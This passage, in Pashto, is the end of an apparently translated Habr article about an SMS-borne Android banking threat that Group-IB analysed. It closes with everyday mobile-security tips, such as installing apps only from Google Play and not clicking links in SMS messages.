خوشبختانه ، هغه څوک چې د مقالې په پیل کې بیان شوي ایس ایم ایس پیغام ترلاسه کړ د سایبر امنیت متخصص شو. له همدې امله، د اصلي، غیر ډایرکټر نسخه له هغه څخه توپیر لري چې مخکې یې وویل: یو کس په زړه پورې SMS ترلاسه کړ، وروسته یې هغه د ګروپ-IB ګواښ ښکار استخباراتي ټیم ته ورکړ. د برید پایله دا مقاله ده. خوشحاله پای، سمه ده؟ په هرصورت، ټولې کیسې په بریالیتوب سره پای ته نه رسیږي، او دا چې ستاسو د پیسو له لاسه ورکولو سره د ډایرکټر کټ په څیر نه ښکاري، په ډیری قضیو کې دا کافي دي چې لاندې اوږد بیان شوي قواعد تعقیب کړئ:
- د ګوګل پلی پرته له کومې سرچینې څخه د Android OS سره د ګرځنده وسیلې لپاره غوښتنلیکونه مه نصب کړئ
- کله چې غوښتنلیک نصب کړئ، د غوښتنلیک لخوا غوښتل شوي حقونو ته ځانګړې پاملرنه وکړئ
- د ډاونلوډ شوي فایلونو غزولو ته پاملرنه وکړئ
- په منظم ډول د Android OS تازه معلومات نصب کړئ
- د شکمنو سرچینو څخه لیدنه مه کوئ او له هغه ځایه فایلونه مه ډاونلوډ کوئ
- په SMS پیغامونو کې ترلاسه شوي لینکونو باندې کلیک مه کوئ.
سرچینه: www.habr.com